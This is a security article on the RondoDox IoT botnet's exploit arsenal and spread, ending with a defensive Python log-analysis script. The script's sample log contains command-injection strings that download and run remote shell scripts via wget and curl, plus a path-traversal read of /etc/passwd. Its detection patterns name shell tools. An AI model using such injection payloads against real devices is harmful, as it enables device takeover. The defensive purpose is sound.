RondoDox Botnet
The RondoDox botnet has sharply broadened its targeting and now exploits more than 50 vulnerabilities in products from over 30 vendors. Researchers describe the approach as an 'exploit shotgun': rather than tailoring an attack to one product, the malware fires a large, fixed set of exploits at any internet-exposed host it finds and keeps whatever it manages to compromise. Affected systems include routers, digital video recorders (DVRs), network video recorders (NVRs), CCTV systems, web servers, and many other network-connected devices.
Early Intrusions and Historical Context
RondoDox was first publicly documented in July 2025, when researchers observed it compromising TBK DVRs and Four-Faith routers and enlisting them in a botnet built to launch distributed denial-of-service (DDoS) attacks over HTTP, UDP, and TCP.
An earlier intrusion attempt, detected on June 15, 2025, targeted TP-Link Archer routers via CVE-2023-1389, a command-injection flaw that has been exploited in the wild repeatedly since it was first demonstrated in late 2022. Taken together, these incidents trace RondoDox's progression from opportunistic attacks on a handful of device models to broader, coordinated campaigns.
Expanded Distribution Through Loader-as-a-Service
RondoDox is now also distributed through a loader-as-a-service (LaaS) operation that bundles its payload with Mirai and Morte malware. A single successful exploit can therefore drop several distinct bot families on one device, which complicates both detection and cleanup: removing one implant does not remove the others, and each family may use its own persistence and command-and-control channel.
Key characteristics of this expanded campaign include:
- Use of weak or default credentials, injection of unsanitized input into device management interfaces, and legacy CVEs to compromise devices
- Targeting of SOHO routers, IoT devices, and enterprise applications
- Multi-vector exploitation, signaling a shift from single-device opportunism to coordinated botnet deployment
Broad Exploit Arsenal
RondoDox now carries exploits for 56 vulnerabilities, 18 of which have no CVE identifier and so will not show up in CVE-based vulnerability scans or patch trackers. The targeted products come from a wide range of vendors, including:
D-Link, TVT, LILIN, Fiberhome, Linksys, BYTEVALUE, ASMAX, Brickcom, IQrouter, Ricon, Nexxt, NETGEAR, Apache, TBK, TOTOLINK, Meteobridge, Digiever, Edimax, QNAP, GNU, Dasan, Tenda, LB-LINK, AVTECH, Zyxel, Hytec Inter, Belkin, Billion, and Cisco.
This arsenal mixes long-known CVEs with bugs that have never been formally documented. A fully patched inventory is therefore necessary but not sufficient: a device for which no fix exists, or whose vendor no longer ships updates, has to be kept off the internet or replaced.
Implications for Cybersecurity
The latest RondoDox campaigns mark a clear step up in automated network exploitation. By pairing loader-as-a-service distribution with a large exploit set, the operators have moved from opportunistic attacks on single device models to multi-vector botnet operations that treat every exposed device as a potential recruit.
Security teams should prioritize patching the known vulnerabilities, keep router, DVR, NVR and camera management interfaces off the public internet, replace default credentials, and monitor for the characteristic signs of mass exploitation: bursts of requests to many unrelated management paths from a single source, shell-injection payloads in request parameters, and outbound connections from devices that should never initiate them.
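One way to turn the monitoring advice above, together with the campaign traits listed under Expanded Distribution, into a concrete check is to look for the 'shotgun' pattern itself: one source hitting several unrelated device management paths in a short window while carrying shell-injection markers. The script below is an added example written for this page, not code from RondoDox or from any vendor or researcher named here. The log lines, the management-path families and the injection regexes are all constructed for illustration and are not tied to specific CVEs; tune them against your own traffic before relying on them.

```python
"""Flag 'exploit shotgun' sources in HTTP access logs (Combined Log Format).

Heuristic: a source that, within one sliding window, probes several distinct
device management paths and sends at least a couple of requests with
shell-injection or traversal markers is scored as a multi-vector exploitation
attempt rather than a single opportunistic exploit or a benign admin session.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Request traits that mark an attempt as an exploit rather than a plain scan:
# command substitution, pipes into a shell, download-and-run chains, traversal.
# Illustrative patterns, assumed for this example.
INJECTION_RE = re.compile(
    r"\$\(|`|\|\s*(sh|bash)\b|;\s*(wget|curl|tftp|busybox|chmod|sh)\b|/bin/(ba)?sh|\.\./",
    re.IGNORECASE,
)
# Management-interface path families common to router/DVR/NVR web stacks.
# Assumed list for the example; extend it from your own device inventory.
DEVICE_PATH_RE = re.compile(
    r"^/(cgi-bin|boaform|goform|HNAP1|setup\.cgi|apply\.cgi|soap)", re.IGNORECASE
)

# Constructed sample log, not real telemetry. 203.0.113.7 behaves like a
# shotgun scanner, 198.51.100.23 like a legitimate admin, 192.0.2.55 like a
# single opportunistic exploit attempt; one line is deliberately malformed.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jun/2025:10:01:02 +0000] "POST /boaform/admin/formPing?target=1.1.1.1%3Bwget+http%3A%2F%2F198.51.100.9%2Fx.sh HTTP/1.1" 404 0 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jun/2025:10:01:05 +0000] "GET /goform/setUsbUnload?deviceName=$(curl+http://198.51.100.9/y.sh|sh) HTTP/1.1" 404 0 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jun/2025:10:02:11 +0000] "GET /HNAP1/ HTTP/1.1" 404 0 "-" "Mozilla/5.0"
not a log line at all
203.0.113.7 - - [15/Jun/2025:10:03:40 +0000] "GET /setup.cgi?next_file=../../etc/passwd HTTP/1.1" 404 0 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jun/2025:12:30:00 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.23 - - [15/Jun/2025:10:05:00 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [15/Jun/2025:10:05:30 +0000] "GET /cgi-bin/status.cgi?refresh=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.55 - - [15/Jun/2025:10:07:13 +0000] "GET /cgi-bin/diag.cgi?host=127.0.0.1%3Bwget+http://198.51.100.9/z.sh HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = unquote_plus(m["uri"])  # decode %xx and '+' so encoded payloads are seen
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "path": uri.split("?", 1)[0],
        "inject": bool(INJECTION_RE.search(uri)),
        "device": bool(DEVICE_PATH_RE.match(uri)),
    }


def shotgun_sources(lines, window=timedelta(minutes=10), min_paths=3, min_inject=2):
    """Return {ip: (distinct_paths, injection_hits)} for sources that, inside
    some window, hit >= min_paths distinct device paths with >= min_inject
    injection-bearing requests. Values are the maxima over qualifying windows."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and (ev["device"] or ev["inject"]):
            by_ip[ev["ip"]].append(ev)

    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            paths = len({e["path"] for e in win})
            inj = sum(e["inject"] for e in win)
            if paths >= min_paths and inj >= min_inject:
                prev = flagged.get(ip, (0, 0))
                flagged[ip] = (max(prev[0], paths), max(prev[1], inj))
    return flagged


if __name__ == "__main__":
    for ip, (paths, inj) in shotgun_sources(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {paths} distinct device paths, {inj} injection payloads")
```

The thresholds are the interesting knobs: a lone request with a `wget` chain in a parameter (192.0.2.55 above) is worth alerting on too, but it is the combination of many unrelated management paths and repeated payloads inside a few minutes that distinguishes a shotgun scanner from a targeted attempt or from a real administrator. Sources the script flags are good candidates for edge blocking, and the devices they reached are the ones to check first for dropped loaders.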